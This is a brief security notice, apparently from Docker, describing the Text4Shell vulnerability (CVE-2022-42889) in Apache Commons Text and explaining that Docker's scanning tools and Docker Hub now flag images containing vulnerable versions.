CVE-2022-42889, aka “Text4Shell”, is a vulnerability in the popular Java library “Apache Commons Text” which can result in arbitrary code execution when processing malicious input. These three mechanisms will be executed on the server and can trigger arbitrary code to execute, pulling code from external sources or embedding arbitrary scripts.
Docker vulnerability scanning tools including the docker scan CLI and https://docs.docker.com/docker-hub/vulnerability-scanning/, powered by Snyk, will detect the presence of the vulnerable versions of the library and flag your image as vulnerable (see below).
As of 12:00 UTC 21 October 2022, Docker Hub now identifies the Text4Shell vulnerability and will badge any image it finds vulnerable.
A number of the Docker Official images do contain the vulnerable versions of Apache Commons Text.